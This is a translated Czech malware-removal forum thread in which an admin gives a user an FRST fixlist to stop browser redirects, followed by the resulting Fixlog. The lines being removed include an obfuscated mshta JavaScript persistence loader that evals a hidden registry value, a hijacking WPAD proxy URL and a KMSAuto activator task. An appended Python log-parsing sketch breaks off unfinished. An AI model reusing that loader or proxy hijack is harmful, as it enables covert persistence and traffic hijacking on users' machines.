2017-10-10 20:23 - 2017-09-07 19:37 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-10-10 20:23 - 2017-09-07 19:36 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-10-10 20:23 - 2017-09-07 19:29 - 004547072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-10-10 20:23 - 2017-09-07 19:29 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-10-10 20:23 - 2017-09-07 19:26 - 000694784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-10-10 20:23 - 2017-09-07 19:25 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-10-10 20:23 - 2017-09-07 19:25 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-10-10 20:23 - 2017-09-07 19:17 - 013677568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-10-10 20:23 - 2017-09-07 19:01 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-10-10 20:23 - 2017-09-07 18:57 - 001316864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-10-10 20:23 - 2017-09-07 18:57 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-10-10 20:23 - 2017-09-07 16:31 - 002851328 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll
2017-10-10 20:23 - 2017-09-07 16:12 - 002755072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themeui.dll
2017-10-10 20:23 - 2017-09-07 15:55 - 000461312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-10-10 20:23 - 2017-09-07 15:55 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-10-10 20:23 - 2017-09-07 15:55 - 000168448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-10-10 20:23 - 2017-08-19 16:28 - 004121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2017-10-10 20:23 - 2017-08-19 16:28 - 000206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2017-10-10 20:23 - 2017-08-19 16:28 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 003209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 000103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2017-10-10 20:23 - 2017-08-19 16:08 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2017-10-10 20:23 - 2017-08-19 16:08 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2017-10-10 20:23 - 2017-08-19 15:57 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2017-10-10 20:23 - 2017-08-19 15:57 - 000023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2017-10-10 20:23 - 2017-08-14 18:35 - 001032192 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2017-10-10 20:23 - 2017-08-14 18:35 - 000827904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2017-10-10 20:23 - 2017-08-14 18:35 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\icaapi.dll
2017-10-10 20:23 - 2017-08-13 22:45 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2017-10-02 15:36 - 2017-10-06 10:38 - 000000000 ____D C:\Users\CAM\AppData\Roaming\ZSSDVol

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-01 03:51 - 2009-07-14 05:45 - 000035312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-11-01 03:51 - 2009-07-14 05:45 - 000035312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-10-31 14:43 - 2011-04-12 09:34 - 001275164 _____ C:\Windows\system32\perfh005.dat
2017-10-31 14:43 - 2011-04-12 09:34 - 000337258 _____ C:\Windows\system32\perfc005.dat
2017-10-31 14:43 - 2009-07-14 06:13 - 003207196 _____ C:\Windows\system32\PerfStringBackup.INI
2017-10-31 14:43 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2017-10-31 14:40 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\inetsrv
2017-10-31 14:38 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-10-31 14:37 - 2017-02-16 07:41 - 000000000 ____D C:\ProgramData\NVIDIA
2017-10-31 11:37 - 2017-03-14 10:22 - 000000000 ____D C:\Users\MSSQLFDLauncher$HORRY
2017-10-31 11:37 - 2017-02-16 07:43 - 000000000 ____D C:\Users\MSSQLFDLauncher
2017-10-31 11:36 - 2017-03-14 10:23 - 000000000 ____D C:\Users\ReportServer$HORRY
2017-10-31 11:36 - 2017-03-14 10:22 - 000000000 ____D C:\Users\MSSQL$HORRY
2017-10-31 11:36 - 2017-02-16 07:43 - 000000000 ____D C:\Users\ReportServer
2017-10-31 11:36 - 2017-02-16 07:43 - 000000000 ____D C:\Users\MSSQLSERVER
2017-10-31 11:35 - 2009-07-14 05:45 - 000582904 _____ C:\Windows\system32\FNTCACHE.DAT
2017-10-31 10:05 - 2017-02-16 15:45 - 000000000 ____D C:\Users\CAM\Documents\Visual Studio 2015
2017-10-31 09:58 - 2016-05-06 11:06 - 000000000 ____D C:\Users\CAM\AppData\Local\CrashDumps
2017-10-31 09:21 - 2017-02-16 14:16 - 000152816 _____ C:\Users\CAM\AppData\Local\GDIPFONTCACHEV1.DAT
2017-10-31 07:51 - 2014-06-12 05:55 - 000000000 ____D C:\FGS40
2017-10-30 05:45 - 2016-03-23 11:38 - 000000000 ____D C:\ProgramData\KMSAutoS
2017-10-30 05:34 - 2014-09-02 10:45 - 000000000 ____D C:\Users\CAM\AppData\Local\Adobe
2017-10-30 05:33 - 2017-03-29 15:03 - 000004408 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-10-30 05:33 - 2016-01-28 16:36 - 000004508 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-10-30 05:33 - 2014-06-11 07:27 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-10-30 05:33 - 2014-06-11 07:27 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-10-30 05:33 - 2014-06-11 07:27 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-10-30 05:33 - 2014-06-11 07:27 - 000000000 ____D C:\Windows\system32\Macromed
2017-10-28 11:21 - 2017-07-04 07:43 - 000000000 ____D C:\Users\DefaultAppPool
2017-10-23 07:32 - 2016-04-01 11:13 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2017-10-23 05:14 - 2017-02-16 07:34 - 000000000 ____D C:\Windows\Panther
2017-10-23 05:14 - 2015-04-20 11:49 - 000001908 _____ C:\Windows\diagwrn.xml
2017-10-23 05:14 - 2015-04-20 11:49 - 000001908 _____ C:\Windows\diagerr.xml
2017-10-11 04:05 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2017-10-11 02:16 - 2009-07-14 03:34 - 000000507 _____ C:\Windows\win.ini
2017-10-11 02:13 - 2017-02-16 15:07 - 003181846 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-10-11 02:03 - 2009-07-14 04:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared
2017-10-06 10:38 - 2017-09-27 14:11 - 000000000 ____D C:\Users\Classic .NET AppPool
2017-10-04 06:57 - 2017-01-18 07:31 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

==================== Files in the root of some directories =======

2016-04-15 12:52 - 2016-04-15 12:52 - 000005120 _____ () C:\Users\CAM\AppData\Roaming\GiftBag.db
2015-10-12 06:08 - 2015-10-12 06:08 - 000018944 ___SH () C:\Users\CAM\AppData\Roaming\Thumbs.db
2015-10-12 06:08 - 2016-04-12 10:40 - 000052736 ___SH () C:\Users\CAM\AppData\Roaming\Microsoft\Thumbs.db
2017-03-09 16:33 - 2017-03-09 16:33 - 000000757 _____ () C:\Users\CAM\AppData\Local\recently-used.xbel
2017-03-09 16:01 - 2017-03-09 16:01 - 000000218 _____ () C:\Users\CAM\AppData\Local\recently-used.xbel.bak
2017-08-05 06:31 - 2017-08-05 06:31 - 000007620 _____ () C:\Users\CAM\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed



===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===

==================== Drive and Memory info ===================



==================== MBR and Partition Table ==================


==================== Scheduled Tasks (whitelisted) ==================

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Alternate Data Streams (whitelisted) ==================


==================== Security Center ==================

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}



===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)

  
***** Velikost "Plochy" *****

Velikost slozky "C:\Users\CAM\Desktop" je 4386 MB.
 
 
***** Startup Programs *****
 
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acrobat Assistant 8.0
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM
"C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher
"C:\Users\CAM\AppData\Roaming\Seznam.cz\szninstall.exe" -c [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeAAMUpdater-1.0
"C:\Users\CAM\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeCS6ServiceManager
"C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Autodesk Sync
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.autoupdate
"C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.szndesktop
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite
"C:\Program Files (x86)\TC UP\TC UP.exe" /wnd=max [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IAStorIcon
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\seznam-listicka-distribuce
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TC UP
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Service Fabric Local Cluster Manager.lnk
C:\PROGRA~1\MIA713~1\SERVIC~1\Tools\SERVIC~2\SERVIC~1.EXE  

 
***** Firewall rules *****

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
    EnableFirewall    REG_DWORD    0x1
    DisableNotifications    REG_DWORD    0x0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    EnableFirewall    REG_DWORD    0x1
    DisableNotifications    REG_DWORD    0x0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
 
***** System Restore *****

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]

 
==================== End Of Log ==============================
Attachments
Addition.zip
(16.63 KiB) Downloaded 86 times

veny
Visitor
Posts: 25
Joined: 27 Aug 2006 21:27

Re: Unwanted pages opening in the browser

#5 Post by veny »

Hi,
I wanted to ask whether I did something wrong, since newer posts already have a reply and a check and mine has had no response so far. If so, I will of course fix it.

The current situation is as follows:
Browser (Opera v.48.0.2685.52) uninstalled, all related data deleted (AppData etc.), registry cleaned.
Ran AdwCleaner, which reported no findings after the scan.
Fresh installation of the browser.

The redirect and the opening of unwanted tabs still persist.
I also tried the IE browser, where the same problem occurs.

Thanks, V.

Rudy
Site Admin
Posts: 118251
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Unwanted pages opening in the browser

#6 Post by Rudy »

Hello!
The only thing you did wrong was posting several posts in a row. If we see that a thread already has replies, we do not open it (if we did, we would get nothing done). We only open those that have 0, at most 1 reply. Just for your information next time. :)

Open Notepad and copy the following into it:
Start
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/software/win/ ... Plugin.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: osf-roaming.16 - No CLSID Value
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
C:\ProgramData\KMSAutoS
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85: "C:\Windows\system32\mshta.exe" "javascript:E0imkJw="Ie";Ch74=new ActiveXObject("WScript.Shell");mOAj43="tR1Qjj";RJJ1Q8=Ch74.RegRead("HKCU\\software\\hfnmncsdhf\\lhfd");e68iUBha="UG";eval(RJJ1Q8);vrj7FY="Ev3nAm";" <==== ATTENTION
Task: {8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2015-08-10] (MSFree Inc.)

EmptyTemp:
End
From the log:
Velikost slozky "C:\Users\CAM\Desktop" je 4386 MB.
That is too much and can slow down system startup. Create a new folder in C:\Users\CAM and move all data from the desktop into it (except shortcuts). Then put a shortcut to that folder on the desktop for easier access.
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want to reactivate the thread, write to me at the e-mail address given above.

veny
Visitor
Posts: 25
Joined: 27 Aug 2006 21:27

Re: Unwanted pages opening in the browser

#7 Post by veny »

thank you for pointing that out
I should use that txt file for FRST and the fix, right? save it as fixlist.txt?

I have reduced the size of the Desktop folder; unfortunately several of us use one account, so it is not possible to keep an eye on everything.


EDIT:
the fix has run

a short test of the browsers looks very good, no redirect or search-engine change has occurred so far

Thank you very much, and please LOCK the thread

if needed I will ask for it to be unlocked

V.

Rudy
Site Admin
Posts: 118251
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Unwanted pages opening in the browser

#8 Post by Rudy »

Yes. I forgot to copy that in:
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the action finishes, a log will appear; copy it here.

veny
Visitor
Posts: 25
Joined: 27 Aug 2006 21:27

Re: Unwanted pages opening in the browser

#9 Post by veny »

as a precaution I am also attaching the log after the FIX
it looks like everything is OK
thanks a lot

Code: Select all

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-11-2017
Ran by CAM (06-11-2017 15:45:17) Run:1
Running from C:\Users\CAM\Desktop
Loaded Profiles: CAM & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER (Available Profiles: CAM & postgres & vaclav & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER & Classic .NET AppPool & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4 ... 8f36423907
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/softwa ... Plugin.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: osf-roaming.16 - No CLSID Value
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
C:\ProgramData\KMSAutoS
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85: "C:\Windows\system32\mshta.exe" "javascript:E0imkJw="Ie";Ch74=new ActiveXObject("WScript.Shell");mOAj43="tR1Qjj";RJJ1Q8=Ch74.RegRead("HKCU\\software\\hfnmncsdhf\\lhfd");e68iUBha="UG";eval(RJJ1Q8);vrj7FY="Ev3nAm";" <==== ATTENTION
Task: {8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2015-08-10] (MSFree Inc.)

EmptyTemp:
End
*****************

HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*yyixt<*> => value not found.
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{658228cd-f130-11e3-b477-806e6f6e6963} => key removed successfully
HKLM\Software\Classes\CLSID\{658228cd-f130-11e3-b477-806e6f6e6963} => key not found. 
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\AutoConfigURL => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => value removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\Software\Classes\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value removed successfully
HKLM\Software\Classes\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{A8F2B9BD-A6A0-486A-9744-18920D898429} => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A8F2B9BD-A6A0-486A-9744-18920D898429} => key removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\livecall => key removed successfully
HKLM\Software\Classes\CLSID\{828030A1-22C1-4009-854F-8E305202313F} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\msnim => key removed successfully
HKLM\Software\Classes\CLSID\{828030A1-22C1-4009-854F-8E305202313F} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb-roaming.16 => key removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\osf-roaming.16 => key removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16] => Error: No automatic fix found for this entry.
C:\ProgramData\KMSAutoS => moved successfully
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} => key removed successfully
C:\Windows\System32\Tasks\KMSAutoNet => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KMSAutoNet => key removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6853571 B
Java, Flash, Steam htmlcache => 33096430 B
Windows/system/drivers => 40622 B
Edge => 0 B
Chrome => 7013417 B
Firefox => 0 B
Opera => 271863258 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 33253 B
LocalService => 0 B
NetworkService => 13294 B
CAM => 35796340 B
postgres => 230538 B
vaclav => 0 B
ReportServer$HORRY => 0 B
MSSQLFDLauncher$HORRY => 0 B
MSSQL$HORRY => 0 B
ReportServer => 0 B
MSSQLFDLauncher => 0 B
MSSQLSERVER => 0 B
Classic .NET AppPool => 0 B
DefaultAppPool => 0 B

RecycleBin => 0 B
EmptyTemp: => 346.5 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:45:30 ====
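
As an added example (not part of the thread and not FRST's own code), the sketch below reads a Fixlog like the one in post #9 and lists the entries the tool did not change, such as the Chrome extension line that ended in `Error: No automatic fix found for this entry.` The function and status names are this example's own assumptions, and the sample lines are a subset copied from the log above.

```python
import re

# Lines copied from the Fixlog in post #9 (a subset, not the whole log).
SAMPLE_FIXLOG = r"""
fixlist content:
*****************
Start
Task: {8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2015-08-10] (MSFree Inc.)
End
*****************
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*yyixt<*> => value not found.
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\AutoConfigURL => value removed successfully
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16] => Error: No automatic fix found for this entry.
C:\ProgramData\KMSAutoS => moved successfully
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85 => key removed successfully
Opera => 271863258 B
EmptyTemp: => 346.5 MB temporary data Removed.
"""

SIZE_RE = re.compile(r"^\d+ B$")  # per-location byte counts in the EmptyTemp section

def classify(result):
    # Status names are this example's own, not FRST terminology.
    if result.startswith("Error:"):
        return "unresolved"
    if result.rstrip(". ").endswith("not found"):
        return "absent"
    if result.endswith("successfully"):
        return "fixed"
    return "size" if SIZE_RE.match(result) else "other"

def parse_fixlog(text):
    """Return (target, result, status) per result line, skipping the echoed fixlist."""
    entries, in_echo, stars = [], False, 0
    for raw in text.splitlines():
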